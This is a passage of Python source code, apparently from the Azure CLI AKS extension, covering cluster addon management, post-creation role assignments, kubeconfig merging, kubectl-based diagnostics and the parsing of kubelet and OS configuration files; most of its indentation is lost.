addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
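    """Enable one or more addons on an existing managed cluster and perform the
    role assignments that monitoring, ingress-appgw and virtual-node require
    after the update completes.
    """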
instance = client.get(resource_group_name, name)
    # this is overwritten by _update_addons(), so the value needs to be recorded here
    msi_auth = instance.service_principal_profile.client_id == "msi"
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same vnet, and the vnet-level Contributor role is granted
            # in a later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
            # Otherwise the cluster is not using a custom VNet; the permission is already granted in the AKS RP,
            # so there is nothing to handle on the client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
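    """Enable or disable the requested addons on the managed cluster object,
    filling in addon-specific configuration, and return the updated instance
    (the actual PUT is issued by the caller).
    """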
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
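    """Merge the kubeconfig in addition_file into existing_file, optionally
    renaming the merged context, and warn if the resulting file is not
    restricted to owner read/write permissions.
    """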
existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # validate the addition before indexing into it below
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
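    """Poll the aks-periscope diagnostic results with kubectl and print the
    per-node network configuration and connectivity tables.
    """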
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
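    """Parse a comma-separated list of Key=Value pairs into a headers dict;
    raises CLIError when a pair is not in Key=Value form.
    """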
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
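    """PUT the managed cluster and, when addons or attached resources need it,
    wait for the result so that monitoring, ingress-appgw, virtual-node, subnet
    and ACR role assignments can be created afterwards.
    """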
    # some addons require post cluster creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'ACR to it, you can manually grant permission to the identity '
                               'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
                               'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
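    """Load a kubelet configuration JSON file (see https://aka.ms/CustomNodeConfig)
    and map its camelCase keys onto a KubeletConfig object.
    """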
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
def _get_linux_os_config(file_path):
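    """Load a Linux OS configuration JSON file (see https://aka.ms/CustomNodeConfig)
    and map its settings, including the sysctls section, onto a LinuxOSConfig object.
    """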
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
